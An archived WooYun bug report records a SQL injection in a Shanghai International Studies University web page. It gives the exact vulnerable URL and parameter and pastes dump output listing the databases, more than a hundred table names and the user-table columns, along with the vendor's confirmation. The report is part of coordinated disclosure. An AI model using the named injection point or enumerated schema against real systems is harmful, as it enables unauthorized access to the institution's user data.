乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-06: 细节已通知厂商并且等待厂商处理中 2015-08-07: 厂商已经确认,细节仅向厂商公开 2015-08-17: 细节向核心白帽子及相关领域专家公开 2015-08-27: 细节向普通白帽子公开 2015-09-06: 细节向实习白帽子公开 2015-09-21: 细节向公众公开
高校安全之上海外国语大学SQL注射一脸
射脸点:http://otc.shisu.edu.cn/main/Showclass.asp?classID=46
脱点数据证明危害
available databases [9]:[*] count[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb[*] web[*] web2Database: count[108 tables]+-----------------------+| MY_AdminOperation || MY_ApplyData || MY_Class || MY_Dormitory || MY_EducationLevel || MY_Message || MY_UserInfo || PE_AdZone || PE_Admin || PE_Advertisement || PE_Announce || PE_AreaCollection || PE_Article || PE_Author || PE_Bank || PE_BankrollItem || PE_Card || PE_Channel || PE_City || PE_Class || PE_Classroom || PE_Client || PE_Comment || PE_Company || PE_ComplainItem || PE_Config || PE_ConsumeLog || PE_Contacter || PE_CopyFrom || PE_Country || PE_DeliverCharge || PE_DeliverItem || PE_DeliverType || PE_Dictionary || PE_DownError || PE_DownServer || PE_Equipment || PE_Favorite || PE_Field || PE_Filters || PE_Friend || PE_FriendSite || PE_FsKind || PE_GuestBook || PE_GuestKind || PE_HistrolyNews || PE_HouseArea || PE_HouseCS || PE_HouseCZ || PE_HouseConfig || PE_HouseHZ || PE_HouseQG || PE_HouseQZ || PE_InfoS || PE_InvoiceItem || PE_Item || PE_JobCategory || PE_JsFile || PE_KeyLink || PE_Label || PE_Log || PE_Message || PE_NewKeys || PE_OrderForm || PE_OrderFormItem || PE_Page || PE_PageClass || PE_Payment || PE_PaymentType || PE_Photo || PE_Position || PE_PositionSupplyInfo || PE_PresentProject || PE_Producer || PE_Product || PE_Province || PE_RechargeLog || PE_Resume || PE_ServiceItem || PE_ShoppingCarts || PE_Skin || PE_Soft || PE_Space || PE_SpaceBook || PE_SpaceComment || PE_SpaceDiary || PE_SpaceKind || PE_SpaceLink || PE_SpaceMusic || PE_SpacePhoto || PE_SpaceVisitor || PE_Special || PE_SubCompany || PE_Supply || PE_Supply_Company || PE_Template || PE_TemplateProject || PE_Trademark || PE_TransferItem || PE_UsedDetail || PE_User || PE_UserGroup || PE_Vote || PE_WorkPlace || applydata_del || dtproperties || sysconstraints || syssegments |+-----------------------+Database: countTable: PE_User[17 columns]+------------+-------------+| Column | Type |+------------+-------------+| articleid | non-numeric || blog | non-numeric || blogid | non-numeric || channelid | non-numeric || classid | non-numeric || companyid | non-numeric || email | non-numeric || groupid | non-numeric || privacy | non-numeric || question | non-numeric || status | non-numeric || templateid | non-numeric || title | non-numeric || user | non-numeric || userid | non-numeric || username | non-numeric || voteid | non-numeric |+------------+-------------+
综上
你们专业
危害等级:高
漏洞Rank:10
确认时间:2015-08-07 05:50
感谢冷白开提交的漏洞,我们将尽快处理,谢谢!
暂无